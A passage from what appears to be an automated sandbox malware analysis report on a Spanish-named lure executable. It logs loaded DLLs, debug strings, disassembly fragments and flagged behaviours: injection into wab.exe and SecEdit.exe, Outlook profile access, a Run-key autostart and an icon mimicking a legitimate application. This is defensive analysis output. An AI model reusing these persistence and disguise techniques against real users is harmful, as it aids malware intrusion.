            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic file information: File size 3079318 > 1048576
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb` source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdb source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdbUGP source: wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000004.00000003.1452243090.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000003.1450246233.0000000003290000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000004.00000002.1543418922.000000000378E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, SecEdit.exe, 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1545415018.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000003.1543063354.0000000002C09000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdbH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdbGCTL source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER6339.tmp.dmp.8.dr
            Source: Binary string: wab.pdb source: SecEdit.exe, 0000000C.00000002.3791538876.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3793502568.00000000035CC000.00000004.10000000.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3792978894.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.1886634795.000000001F9DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: Binary string: SecEdit.pdbGCTL source: wab.exe, 00000004.00000002.1543304838.0000000003197000.00000004.00000020.00020000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3791818331.000000000102E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1467468971.00000000006CE000.00000002.00000001.01000000.00000008.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000002.3790653322.00000000006CE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: mscorlib.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Windows.Forms.pdb8 source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Drawing.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Xml.pdbpH source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.ni.pdb source: WER6339.tmp.dmp.8.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER6339.tmp.dmp.8.dr
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0236F62 push esi; iretd 0_2_00007FF7C0236FD7
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0320000 push esp; retf 4810h0_2_00007FF7C0320312
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041E006 push edx; iretd 4_2_0041DFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041E006 push ss; ret 4_2_0041E025
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004051ED push edx; ret 4_2_00405225
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004032E0 push eax; ret 4_2_004032E2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00422C43 pushad ; iretd 4_2_00422CEC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040CC0D push edi; iretd 4_2_0040CC0E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00411413 push edi; iretd 4_2_0041141A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040CD21 pushfd ; retf 4_2_0040CD22
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00413E8B push eax; retf 4_2_00413E8C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040A746 push eax; iretd 4_2_0040A74D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041DF1C push edx; iretd 4_2_0041DFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0041DF23 push edx; iretd 4_2_0041DFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_00404F37 push cs; ret 4_2_00404F3A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036209AD push ecx; mov dword ptr [esp], ecx4_2_036209B6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD09AD push ecx; mov dword ptr [esp], ecx12_2_02FD09B6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059008E pushfd ; retf 12_2_00590095
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057E130 push edi; iretd 12_2_0057E137
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_005901A8 push edx; iretd 12_2_005901B9
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00577463 push eax; iretd 12_2_0057746A
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058B657 pushad ; retf 12_2_0058B658
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059067C pushad ; iretd 12_2_00590699
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059069D push esp; iretd 12_2_005906AA
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058F960 pushad ; iretd 12_2_0058FA09
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058F9EF pushad ; iretd 12_2_0058FA09
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058BA1D push ds; ret 12_2_0058BA2B
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00571C54 push cs; ret 12_2_00571C57
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058AC40 push edx; iretd 12_2_0058ACFD
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058AC39 push edx; iretd 12_2_0058ACFD
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058AD23 push edx; iretd 12_2_0058ACFD

            Boot Survival

            barindex
            Creates autostart registry keys with suspicious names
            Source: C:\Windows\SysWOW64\SecEdit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26RXLR-Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26RXLR-Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26RXLR-Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (27).png
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
